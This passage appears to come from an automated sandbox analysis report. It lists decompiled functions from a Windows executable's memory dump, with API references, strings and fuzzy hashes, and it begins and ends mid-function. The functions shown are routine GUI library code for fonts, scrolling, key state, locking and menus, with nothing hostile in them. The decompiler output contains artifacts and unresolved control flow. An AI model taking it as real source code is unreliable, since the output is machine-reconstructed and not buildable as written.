				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f59d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F5A4);
					return E0040436C( &_v80, 3);
				} else {
					_t76 =  *0x492a74; // 0x2210658
					E0041E798(_t76);
					_push(_t137);
					_push(0x41f575);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E004045A4( &_v72, _v8 + 0x1b);
						if(E00408628(_v72, "Default") != 0) {
							E004045A4( &_v80, _v8 + 0x1b);
							E00408C6C( &(_v68.lfFaceName), _v80);
						} else {
							E004045A4( &_v76, "\rMS Sans Serif");
							E00408C6C( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F6F8(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f57c);
					_t81 =  *0x492a74; // 0x2210658
					return E0041E7A4(_t81);
				}
			}

APIs

Part of subcall function 0041E798: RtlEnterCriticalSection.KERNEL32(?,0041E7D5), ref: 0041E79C

CreateFontIndirectA.GDI32(?), ref: 0041F552

Strings

Default, xrefs: 0041F4E0
MS Sans Serif, xrefs: 0041F4F1

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalEnterFontIndirectSection
String ID: MS Sans Serif$Default
API String ID: 2931345757-2137701257
Opcode ID: 235641115eaf7087f4a27fd447ab1447b251295f7c6042ca9a81122b6808554d
Instruction ID: 64183040bfa769755d635c6de005338080203cf3be7aeb1155d4dd07bedbb18e
Opcode Fuzzy Hash: 235641115eaf7087f4a27fd447ab1447b251295f7c6042ca9a81122b6808554d
Instruction Fuzzy Hash: 6C515231A04248EFDB11CFA8C545BCDBBF6AF49304F6540BAD800A7352D3789E4ADB29

Uniqueness

Uniqueness Score: -1.00%

Function 0045E324, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E324(char __eax, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v96;
				intOrPtr _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				intOrPtr _t36;
				void* _t52;
				int _t60;
				intOrPtr _t81;
				intOrPtr* _t106;
				void* _t107;

				_v8 = __eax;
				_t106 =  &_v8;
				_t36 = E0043C4F8( *_t106);
				if(_t36 != 0) {
					_t36 =  *_t106;
					if( *((char*)(_t36 + 0x254)) != 0) {
						E0045C724( *_t106,  &_v124);
						_v24 =  *((intOrPtr*)( *_t106 + 0x21c)) - 1;
						_v20 =  *((intOrPtr*)( *_t106 + 0x24c)) - 1;
						E0045C95C( &_v124,  &_v24,  &_v132);
						_v24 = _v132;
						_v20 = _v128;
						_t52 =  *((intOrPtr*)( *_t106 + 0x254)) - 1;
						if(_t52 == 0 || _t52 == 2) {
							if( *((intOrPtr*)( *_t106 + 0x21c)) != 1) {
								_t60 = MulDiv( *((intOrPtr*)( *_t106 + 0x258)) -  *((intOrPtr*)( *_t106 + 0x238)), 0x7f, _v24 -  *((intOrPtr*)( *_t106 + 0x238)));
								__eflags = 0;
								E0045E2A4(0, _t60, 0, _t107);
							} else {
								_v12 = E0045F798( *_t106, _v96);
								_v16 = E00435578( *_t106) - _v120;
								_t81 =  *((intOrPtr*)( *_t106 + 0x288));
								if(_t81 <= 0) {
									L8:
									E0045E2A4(0, _t81, __eflags, _t107);
								} else {
									_t24 =  &_v16; // 0x45e239
									_t115 = _v12 - _t81 -  *_t24;
									if(_v12 - _t81 >=  *_t24) {
										goto L8;
									} else {
										_t26 =  &_v16; // 0x45e239
										E0045DAEC( *_t106, 4, 0, _t115, 1, _v12 -  *_t26);
									}
								}
							}
						}
						_t36 =  *((intOrPtr*)( *_t106 + 0x254)) + 0xfe - 2;
						if(_t36 < 0) {
							return E0045E2A4(1, MulDiv( *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), 0x7f, _v20 -  *((intOrPtr*)( *_t106 + 0x23c))),  *((intOrPtr*)( *_t106 + 0x25c)) -  *((intOrPtr*)( *_t106 + 0x23c)), _t107);
						}
					}
				}
				return _t36;
			}

APIs

MulDiv.KERNEL32(?,0000007F,?), ref: 0045E459

Part of subcall function 0045E2A4: GetScrollPos.USER32(00000000,0000FFC8), ref: 0045E300
Part of subcall function 0045E2A4: SetScrollPos.USER32 ref: 0045E319

Strings

9E, xrefs: 0045E3D9, 0045E3E1, 0045E3E4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Scroll
String ID: 9E
API String ID: 3938139061-2110824515
Opcode ID: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
Instruction ID: de22b2d6b14abcdee14fd2ecfa3518816f25c4360ea5400ce03ee1d267647bf5
Opcode Fuzzy Hash: ef076b6f91338936a2bb02e87197e972c589a1f9fb8b6cd06bf34d3e7bd53693
Instruction Fuzzy Hash: D0414C35A001098FDB10DFADC588DAEB7F4EF18305F2045AAE984E7316DA35AE09CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A56C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A56C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a727);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x491120; // 0x4075b0
					E00406548(_t52,  &_v8);
				} else {
					_t86 =  *0x4912a0; // 0x4075a8
					E00406548(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x4911f4; // 0x407550
					E00406548(_t60,  &_v372);
					E0040A194(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004045B0( &_v340, 0x105,  &_v297);
					E00408AA4(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x491198; // 0x407600
					E00406548(_t82,  &_v344);
					E0040A194(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A72E);
				E00404348( &_v372);
				E0040436C( &_v344, 3);
				return E00404348( &_v8);
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A727), ref: 0040A5D7
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A727), ref: 0040A5F9

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Strings

Pu@, xrefs: 0040A6D8

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: Pu@
API String ID: 902310565-3077127041
Opcode ID: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction ID: 240e037d2e4fdf7a2f2a9f7972edbd4e2c0b15f25f5dccbaf71f1a2df42bcb43
Opcode Fuzzy Hash: 02156adca1f585b11c0c4578929e0c4ae99548c1f3482961343618982b328d77
Instruction Fuzzy Hash: 8E410570900668DFDB61DF64CD81BDAB7F4AB49304F4040EAE908AB395D778AE84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0044898C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044898C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x492bf8; // 0x2210880
					E0042687C(_t34,  &_v24);
					_push(_t69);
					_push(0x448a8a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E00448690(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x448a91);
							_t40 =  *0x492bf8; // 0x2210880
							return E00426874(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x492bf8; // 0x2210880
					E0042687C(_t42,  &_v8);
					_push(_t69);
					_push(0x448a5f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E00448838( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x448a66);
					_t48 =  *0x492bf8; // 0x2210880
					return E00426874(_t48);
				}
				L14:
			}

APIs

GetKeyState.USER32(00000010), ref: 004489B0
GetKeyState.USER32(00000011), ref: 004489C2

Strings

, xrefs: 004489D2

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: e34ac20bf1577ff9bf75a0614ffc8b50759ed40ebfae39e54516f6bf0673af27
Instruction ID: 30f9d3f5a50346b50cace2907c7ce9bbd4ad570ce9a17f6df8ef4bc3d9cf31fe
Opcode Fuzzy Hash: e34ac20bf1577ff9bf75a0614ffc8b50759ed40ebfae39e54516f6bf0673af27
Instruction Fuzzy Hash: B931D634A04308EFFB11EFA5D90169EB7F5EB44304F5584BBE800B7291EAB89A00C658

Uniqueness

Uniqueness Score: -1.00%

Function 00424D68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00424D68(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E004035AC(1);
				_push(_t77);
				_push(0x424def);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x4122e0; // 0x41232c
				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x492a44);
				L004068AC();
				_push(_t77);
				_push(0x424e4f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E004237FC( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E004237F8(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x424e56);
				_push(0x492a44);
				L004069F4();
				return 0;
			}

APIs

RtlEnterCriticalSection.KERNEL32(00492A44,00000000,?,?), ref: 00424E0B
RtlLeaveCriticalSection.KERNEL32(00492A44,00424E56,00492A44,00000000,?,?), ref: 00424E49

Strings

,#A, xrefs: 00424DD4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: ,#A
API String ID: 3168844106-1902403825
Opcode ID: 2b5b3184f5fafa65cc736e12a1ecfee740cdb6b8bd0164809beca74f5554cf4f
Instruction ID: c82025d02218eb86c3043db56a4d0818c2728f90a6f848b2207ad54f2327b0ef
Opcode Fuzzy Hash: 2b5b3184f5fafa65cc736e12a1ecfee740cdb6b8bd0164809beca74f5554cf4f
Instruction Fuzzy Hash: D3218375B04304EFDB15DF69D881989BBF5FB88710B5181AAF804A7761C678EE40CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00424344, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00424344(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t43;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t59 = __edi;
				_t64 = _t66;
				_t67 = _t66 + 0xffffffa8;
				_push(_t60);
				_t43 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					_push(0x492a44);
					L004068AC();
					_push(_t64);
					_push(0x4243fc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					if(_t43 == 0) {
						E00402EF0( &_v92, 0x54);
						E00424D68(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
					} else {
						_t61 = _t43;
						E004237F8( *((intOrPtr*)(_t61 + 0x28)));
						E004237FC( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E00424403);
					_push(0x492a44);
					L004069F4();
					return 0;
				} else {
					_t57 =  *0x41e494; // 0x41e4e0
					if(E00403768(__edx, _t57) == 0) {
						_t41 = E00414A88(_v8, _t43);
						return _t41;
					} else {
						goto L2;
					}
				}
			}

APIs

RtlEnterCriticalSection.KERNEL32(00492A44), ref: 0042436F
RtlLeaveCriticalSection.KERNEL32(00492A44,00424403,00000000,004243FC,?,00492A44), ref: 004243F6

Part of subcall function 00424D68: RtlEnterCriticalSection.KERNEL32(00492A44,00000000,?,?), ref: 00424E0B
Part of subcall function 00424D68: RtlLeaveCriticalSection.KERNEL32(00492A44,00424E56,00492A44,00000000,?,?), ref: 00424E49

Strings

A, xrefs: 00424357

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: A
API String ID: 3168844106-2078354741
Opcode ID: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction ID: e4c60fae559a079f8f962c10c3cb4d28f77953d953f980d94cfa5674b0fd86e4
Opcode Fuzzy Hash: 2be02bd0951b54f05d6a4697f063ef31634a22b8b0d7236929331057d0209b4d
Instruction Fuzzy Hash: 0F212C757042459FCB10DF99D98299EB7F5FF8C310BA041BAE80493752C674DE01DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0044874C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044874C(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E00448690(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x4445d8; // 0x444624
						if(E00403768(_t51, _t45) != 0) {
							E00447764( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E00447764(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E00447DFC(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E004482F8(_t50, 0)) != 0) {
						E004457D4(_t50, 0);
					}
					_t27 =  *0x49111c; // 0x492c04
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043C1F4(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}

APIs

SendMessageA.USER32(?,00000234,00000000,00000000), ref: 004487D2
DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 004487E3

Strings

$FD, xrefs: 004487F4

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawMenuMessageSend
String ID: $FD
API String ID: 2625368238-395794980
Opcode ID: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction ID: 09470d85930791357d69d9dfc81ff92af356171fadd1370cda87ce25fedad38f
Opcode Fuzzy Hash: d2d2ccfdfaaae11247bacaee34b8040d9b1ea4ac6513cfff3c17b8ffe6846643
Instruction Fuzzy Hash: 72116A347046405BFA10EA2A8C8576AA7965F95318F19407BF9009B396DE7CEC069B58

Uniqueness

Uniqueness Score: -1.00%

Function 00435F30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435F30(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414218( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E004141BC(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435514(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

APIs

IntersectRect.USER32 ref: 00435F90
EqualRect.USER32 ref: 00435FA0

Strings

@, xrefs: 00435F71

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: dbc5333581a1cf13dfe8a72e8ad6691df3d9856acb27b401823a38851404085f
Instruction ID: 01d255ee1b722bc3008dbe0edacece7f35c8b747239cce09de88e3b891fc9bf3
Opcode Fuzzy Hash: dbc5333581a1cf13dfe8a72e8ad6691df3d9856acb27b401823a38851404085f
Instruction Fuzzy Hash: 8911A331604648ABC701DA6CC884BDF7BE89F49328F0442A6FD04EB342D779DD4587D8

Uniqueness

Uniqueness Score: -1.00%

Function 0046DDD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0046DDD4(char __edx, void* __edi, void* __esi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t12;
				signed int _t21;
				signed int _t22;
				signed int _t25;
				void* _t28;
				void* _t31;
				void* _t32;
				char _t33;
				signed int _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;

				_t40 = __esi;
				_t39 = __edi;
				_t33 = __edx;
				if(__edx != 0) {
					_t42 = _t42 + 0xfffffff0;
					_t12 = E00403940(_t12, _t41);
				}
				_v5 = _t33;
				_t31 = _t12;
				E0043808C(_t31, _t32, 0, _t39, _t40);
				E00435330(_t31, GetSystemMetrics(2));
				E00435354(_t31, GetSystemMetrics(0x14));
				_t21 =  *(_t31 + 0x4c);
				_t37 = _t21;
				_t22 = _t21 >> 1;
				if(0 < 0) {
					asm("adc eax, 0x0");
				}
				E00435354(_t31, _t37 + _t22);
				 *((char*)(_t31 + 0x208)) = 1;
				 *((short*)(_t31 + 0x212)) = 0x64;
				 *((intOrPtr*)(_t31 + 0x214)) = 1;
				 *((char*)(_t31 + 0x228)) = 1;
				 *((char*)(_t31 + 0x229)) = 1;
				 *((char*)(_t31 + 0x21e)) = 1;
				_t25 =  *0x46de84; // 0x80
				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
				_t28 = _t31;
				if(_v5 != 0) {
					E00403998(_t28);
					_pop( *[fs:0x0]);
				}
				return _t31;
			}

APIs

GetSystemMetrics.USER32 ref: 0046DDF5
GetSystemMetrics.USER32 ref: 0046DE05

Strings

d, xrefs: 0046DE2F

Memory Dump Source

Source File: 00000003.00000002.705551634.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.705537421.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.705737203.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705744356.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705784994.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.705795848.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.705810987.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem
String ID: d
API String ID: 4116985748-2564639436
Opcode ID: a1809def662c50379d642b71605161b6dd6644318fa055b6925c5c9479d7b7fa
Instruction ID: 92cf4d2ad0ea0bdd6e0aca3f1e07709481ff7d6c600e189b7014b94f43e94bcc
Opcode Fuzzy Hash: a1809def662c50379d642b71605161b6dd6644318fa055b6925c5c9479d7b7fa
Instruction Fuzzy Hash: 5A117061B446448AD700EF7998863853A955B1530CF085579EC488F387EABE9848832A

Uniqueness

Uniqueness Score: -1.00%

Function 0044C628, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0044C628(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
